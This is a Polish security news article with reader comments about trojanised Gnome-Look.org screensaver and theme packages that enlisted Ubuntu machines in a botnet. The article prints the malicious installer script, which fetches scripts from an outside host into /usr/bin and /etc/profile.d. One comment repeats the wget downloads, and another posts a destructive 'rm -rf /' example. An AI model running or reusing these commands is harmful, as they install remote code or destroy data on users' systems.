16:22
10/12/2009

Jeśli instalowaliście ostatnio na swoim Ubuntu wygaszacze ekranu lub skórki ściągnięte z popularnego serwisu Gnome-Look.org, mamy dla was złą wiadomość. W niektórych plikach tego serwisu znaleziono złośliwe oprogramowanie. Czyżby był to pierwszy przypadek trojana na Ubuntu? :-)

Złośliwe instrukcje znaleziono w instalatorach wygaszacza ekranu Waterfall ScreenSaver oraz skórki Ninja Black. Instalatory (.deb) tych “upiększaczy systemu” zawierały polecenia ściągające z internetu złośliwy skrypt, dodający Ubuntu do botnetu.

#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit

Jak widać, malware umiejscawia się w tzw. login shellu (profile.d) i aktualizuje swój kod przy każdym logowaniu użytkownika do zainfekowanego Linuksa. Złośliwe oprogramowanie najprawdopodobniej zmuszało zaatakowane Ubuntu do “pomocy” w przeprowadzaniu ataków DDoS.

Czy Ubuntu jest niebezpieczne?

Tak, ale głównie dzięki osobie, która z niego korzysta ;)

Powyższy atak nie wykorzystuje żadnej dziury w Ubuntu. Infekcja jest możliwa, ponieważ podczas instalacji .deb-ów wymagane jest podanie hasła roota. Uzyskawszy hasło superużytkownika, złośliwy skrypt jest w stanie dowolnie modyfikować system.

Powyższy atak jest więc bardziej przykładem udanego social engieeringu, który wykorzystując chęć użytkownika do upiększenia swojego systemu operacyjnego, uzyskuje hasło roota.

Należy pamiętać, że niezależnie od używanego systemu operacyjnego, instalacja oprogramowania z nieoficjalnych źródeł może skończyć się nieprzyjemnie.

W przypadku Linuksa, deby z niezaufanych źródeł (np. spoza repozytoriów) mogą zawierać w skrypcie instalacyjnym “dodatkowe linijkę” wykonujące złośliwe komendy. Gdyby przenieść omawiany atak na świat Windowsa, sytuacja przypominałaby przejście na stronę wygaszacz.com i ściągnięcie, a następnie instalacja pliku wygaszacz.exe — nigdy nie wiadomo, co się stanie… Trzeba jednak szczerze przyznać, że użytkownicy Windows, z racji rozpowszechnionych na tą platformę programów antywirusowych, mają większe szanse na wyjście cało z sytuacji.

Moje Ubuntu jest zainfekowane, co zrobić?

Jeśli instalowałeś dodatki z serwisu Gnome-Look (ale tylko wtedy!), otwórz terminal i wklep poniższą linijkę:

sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552

To powinno usunąć złośliwe oprogramowanie z twojego systemu.

No cóż, trojan na Linuksie nigdy długo nie pożyje, zawsze któryś z pryszczersów rzuci okiem w kod i znajdzie niepokojącą linijkę. Z punktu widzenia cyberprzestępcy, lepiej jest więc pisać malware na Windowsy — to właśnie z nich w większości korzystają mniej techniczni użytkownicy.

Przeczytaj także:


Dowiedz się, jak zabezpieczyć swoje dane i pieniądze przed cyberprzestępcami. Wpadnij na nasz kultowy ~3 godzinny wykład pt. "Jak nie dać się zhackować?" i poznaj kilkadziesiąt praktycznych i przede wszystkim prostych do zastosowania porad, które skutecznie podniosą Twoje bezpieczeństwo i pomogą ochronić przed atakami Twoich najbliższych. Uczestnicy tego wykładu oceniają go na: 9,34/10!

Na ten wykład powinien przyjść każdy, kto korzysta z internetu na smartfonie lub komputerze, prywatnie albo służbowo. Wykład prowadzimy prostym językiem, wiec zrozumie go każdy, także osoby spoza branży IT. Dlatego na wykład możesz spokojnie przyjść ze swoimi rodzicami lub mniej technicznymih znajomych. W najbliższych tygodniach będziemy w poniższych miastach:

Zobacz pełen opis wykładu klikając tutaj lub kup bilet na wykład klikając tu.

20 komentarzy

Dodaj komentarz
  1. Hm, patrząc nawet po rodzinie, większość użytkowników Win nie tylko linijki kodu nie przeczyta, ale nawet zawartości okienka, które wyskakuje. Kilka cokolwiek, byle się schowało. No i zajebiście, dziwić się, że takim ludziom potem nic nie działa.

  2. W sumie to co się dziwić, że userzy nie czytają okien z komunikatami, jak na Windowskie wyskakuje ich całe mnóstwo i to już taki odruch ;) Siedząc jakiś czas na Debianie bardzo rzadko zdarza mi się jakiś komunikat w 90% to Updaty lub informacje o braku miejsca na HDD.

    A co do gnome-look to myślałem, że wrzucone tam pliki są już przejrzane pod takim kontem i nie stanowią zagrożenia :] no cóż trzeba będzie częściej patrzeć w kod.

  3. > Trzeba jednak szczerze przyznać, że użytkownicy
    > Windows, z racji rozpowszechnionych na tą platformę
    > programów antywirusowych, mają większe szanse na
    > wyjście cało z sytuacji.
    taa, jasne. który antywirus jest na tyle mądry, żeby blokować skrypt, który pobiera jakiś plik z sieci? przecież nie wiadomo czy użytkownik nie robi tego świadomie. owszem, zablokuje, jeżeli zagrożenie jest znane, ale jeżeli zaraz przepiszę ten skrypt bashowy na batchowy i udostępnię go publice to jestem niemal pewien, że antywirus nic z nim nie zrobi (ba! być może nawet obędzie się bez hasła administratora).

    jakby nie patrzeć, Windows i tak jest stratny. ;)

  4. Pierwszy trojan na Ubuntu?

    Trojany na Linuksy były i będą , inną rzeczą jest czy ktoś chce sobie je zainstalować . Po to są podpisywane pakiety kluczem GPG , by nie instalować badziewia .Już pozamiatane . Me …

    wget http://05748.t35.com/Bots/Auto.bash
    –2009-12-11 01:48:03– http://05748.t35.com/Bots/Auto.bash
    Translacja 05748.t35.com… 66.45.237.212, 69.10.48.106
    Łączenie się z 05748.t35.com|66.45.237.212|:80… połączono.
    Żądanie HTTP wysłano, oczekiwanie na odpowiedź… 403 Forbidden
    2009-12-11 01:48:04 BŁĄD 403: Forbidden.

    wget http://05748.t35.com/Bots/gnome.sh
    –2009-12-11 02:02:49– http://05748.t35.com/Bots/gnome.sh
    Translacja 05748.t35.com… 66.45.237.212, 69.10.48.106
    Łączenie się z 05748.t35.com|66.45.237.212|:80… połączono.
    Żądanie HTTP wysłano, oczekiwanie na odpowiedź… 403 Forbidden
    2009-12-11 02:02:49 BŁĄD 403: Forbidden.

    wget http://05748.t35.com/Bots/run.bash
    –2009-12-11 01:53:21– http://05748.t35.com/Bots/run.bash
    Translacja 05748.t35.com… 66.45.237.212, 69.10.48.106
    Łączenie się z 05748.t35.com|66.45.237.212|:80… połączono.
    Żądanie HTTP wysłano, oczekiwanie na odpowiedź… 403 Forbidden
    2009-12-11 01:53:21 BŁĄD 403: Forbidden.

    wget http://05748.t35.com/Bots/index.php
    –2009-12-11 01:59:56– http://05748.t35.com/Bots/index.php
    Translacja 05748.t35.com… 69.10.48.106, 66.45.237.212
    Łączenie się z 05748.t35.com|69.10.48.106|:80… połączono.
    Żądanie HTTP wysłano, oczekiwanie na odpowiedź… 403 Forbidden
    2009-12-11 01:59:56 BŁĄD 403: Forbidden.

  5. Niestety wraz z popularyzacją Ubuntu i innych linuxów coraz więcej będzie również zwykłych, niezorientowanych w temacie użytkowników. Na wstępie dostaną informację, że ich linux jest super bezpieczny i żaden wirus im nie jest straszny więc nawet do głowy im nie przyjdzie że instalując coś mogą sobie zrobić kuku. W windowsie przynajmniej jeśli mają jakiegoś antywirusa jest szansa że jakieś ostrzeżenie dostaną i go nie zignorują. Myślę że twórcy linuksów będą musieli to prędzej czy później wziąć pod uwagę.

  6. […] został obalony mit Linuksa, jako systemu w którym zawsze jesteś bezpieczny. Dziś pada mit chmury, która z niezrozumiałych […]

  7. Niestety ostatnio udostępniona instalka (.deb) Google Chrome beta dla Linuksa zachowuje się prawie identycznie:
    – do sources.list dodaje:
    deb http://dl.google.com/linux/deb/ stable main
    – do keyringu apta dodaje klucz Googli:
    pub 1024D/7FAC5991 2007-03-08
    uid Google, Inc. Linux Package Signing Key
    sub 2048g/C07CB649 2007-03-08
    – do /etc/cron.daily wrzuca skrypt, który sprawdza czy dwie powyższe rzeczy są zrobione i jak nie to je robi…

  8. […] niebezpiecznik.pl Follow us on Twitter 1,510 śledzących RSS Feed 168 czytelników Pierwszy trojan na Ubuntu? 1 głosuj! Jeśli instalowaliście ostatnio na swoim Ubuntu wygaszacze ekranu lub skórki […]

  9. Po pierwsze jak ktoś mniej więcej patrzy co instaluje to od razu zobaczy, że w tym kodzie jest coś nie tak. To taki sam “wirus” jak te pisane na Windowsa z użyciem “echo”…

  10. Nie chcę nic mówić, ale niektórzy linuksiarze-neofici z nadmiernej pewności o bezpieczeństwo instalują programy pochodzące skądkolwiek i pakowane przez kogokolwiek.

    Sami proszą się, by ładować syf. A wystarczy, by dystrybucje zainteresowały się mechanizmami propozycji nowych pakietów i zachęcały kolejnych aktywistów.

  11. Potem się dziwić że mówi się o “dzieciach Ubuntu”. Użytkowników Windowsa którzy przechodzą na Linuksa przenosząc razem ze sobą cały bagaż złych i głupich nawyków jakie Windows uczy (NIE OBRAŻAJĄC UŻYTKOWNIKÓW UBUNTU, sam nim jestem odkąd przesiadłem się z Debiana, to jak mówić o dzieciach neostrady, też nie chodzi o użytkowników neostrady).
    Jeżeli coś jest w repo to jest w repo i raczej spokojnie można instalować. Jeżeli coś jest od zaufanej firmy to raczej spokojnie można instalować. Jeżeli coś jest ogólnie z zaufanego źródła to instaluj.
    Ale jeżeli coś nie przechodzi żadnej weryfikacji, NIE MA ŻADNEJ PEWNOŚCI co do tego czy jest bezpieczne i godne zaufania to albo tego nie instaluj albo chociaż rozpakuj głupią paczkę i zobacz czy nie ma w niej jakiegoś świństwa. Wypakować paczkę, wydrukować zawartość z opcją grep na takie komendy jak rm, wget itp co da nam troszkę info na temat co się będzie dziać.

    Bo na dobrą sprawę mógłbym dać jeszcze prostszego wirusa:

    #!/bin/sh
    sudo rm -rf /home
    sudo rm -rf /

    i wrzucić go w jakiś temat w stylu “wifi mi nie chodzi bo kupiłem sprzęt składany w stodole bez zastanowienia – a na Windowsie chodzi” gdzie ludzie którzy przesiadają się z Windowsa bez zastanowienia, zamiast go poznać, używać to narzekają na problemy ze sprzętem i całe szczęście dla normalnych ludzi – w końcu wracają do Windowsa.

  12. “otwórz terminal i wklep”
    przyzwyczajacie ludzi do bezmyślnego kopiowania poleceń z “how to” rozsianych po sieci,sugeruje podlinkować rozwiązanie problemu umieszczone na oficjalnym forum,przynajmniej tam ma szansę być zweryfikowane przez tzw. pryszczersów :)
    , :( link też można podrobić/zamaskować,sam już nie wiem :(

  13. “Bo na dobrą sprawę mógłbym dać jeszcze prostszego wirusa:

    #!/bin/sh
    sudo rm -rf /home
    sudo rm -rf /”
    czy to można nazwać wirusem ?

    W windowsie można zrobić BATcha z linijką format c: i kazać potwierdzić.

  14. Oj, widzę, że sporo tutaj linukoswych loversów ;). No, ale co się dziwić, w końcu tylko oni są _jedynymi_nieomylnymi_userami_na_wieki_wieków_. [/flejm]

    A patrzenie w każdy instalowany program zakrawa na urojenia. Dlatego polecam odcięcie kabla od neta i nie instalowanie nieczego – wysokie bezpieczeństwo gwarantowane.

  15. @RadX pod Windowsem nie zadziala .bat z linijką format c:
    Chcesz to sprawdź…
    Natomiast to co masz podane w poscie do ktorego odpowiadales po podaniu hasla – a i owszem, zadziala:)

  16. Zadziała, jeżeli obecnie uruchomiony system jest na innym dysku (innej partycji) niż dysk C:.
    Windows (od 2000 w górę) sam się nie sformaci, a szkoda.

  17. Witam. Kompletnie nie znam się na linuksie i mam pytanie:
    Czy odwiedzając stronę internetową na której jest trojan to niebezpieczeństwo jest identyczne używając linuksa czy windowsa?
    Ja to widzę tak że na windowsie trojan czy wirus może zainstalować się bez wiedzy użytkownika a na linuksie musi samodzielnie go zainstalować (podać hasło itd) ?

  18. Damian: pierwsza bariera to format binariów. Aplikacje skompilowane pod Windows ot tak nie uruchomią się na Linuksie wcale. Do tego trzeba Wine. A i to nie gwarantuje, że to zadziała :] .

    Oprogramowanie skompilowane pod Linuksa na Windowsie także zadziała tylko za pomocą pośrednika. Innymi słowy: oprogramowanie złośliwe jest wycelowane w konkretną platformę. I będzie tak dopóki nie zostanie stworzony uniwersalny format binarium, a widzi mi się, że mogłoby to być możliwe.

    • Kiedyś na Mandrivie 2005 otwierałem dyskietkę, którą mama przyniosła z pracy, gdzie “administratorka” nie umiała nawet Windowsa przeinstalować. Na dyskietce, poza prezentacją, były 3 pliki: host.exe, copy.exe i oczywiście autorun. Miałem skonfigurowanego Wine’a (nawet Diablo chodziło), więc dla jaj postanowiłem toto uruchomić. Zadziałało. Windowsa miałem 98 wtedy. Wirusa później usunąłem, zaś sama dyskietka z wirusem poszła do kolegi, który bardzo chciał ją mieć (zgadnijcie, po co).

      Poza tym jeśli chodzi o użytkowników Win, to czasem BFG się w kieszeni otwiera. Włazić do je*anego internetu bez pie*dolonego antywira, później, kutwa, PRZERYWAĆ skanowanie przy reboocie, bo kutwa, “ja chcę teraz do internetu”, a na koniec płacz, bo “haker mi się włamał”.

  19. wiecie co jestem nowy na linuxie przesiadłem z win 7 i nie mam takich problemów, choć antywirusa sobie poszukałem apletach tak na wszelki wypadek i owszem nie znam się za dobrze na linuxie, ale pomału się go uczę i zaczynam uważać że jest lepszy od windowsa i to dużo co do tematu, na każdy system da się włamać i zrobić wirusa ale haker, jak chce włamać to raczej tam gdzie ma korzyść z ataku, a nie do normalnego użytkownika który przechowuje swoje które mogą zawierać dane np. bankowe hasła dostępu itp. ale bardziej im się opłaca się atakować firmy i urzędy państwowe, lecz to są naprawdę dobrzy hakerzy bo przeważnie nie jedna firma jest doskonale chroniona, a decyduje tu błąd człowieka nie komputera czy oprogramowania tyle mam do powiedzenia.

Twój komentarz

Zamieszczając komentarz akceptujesz regulamin dodawania komentarzy. Przez moderację nie przejdą: wycieczki osobiste, komentarze nie na temat, wulgaryzmy.

RSS dla komentarzy: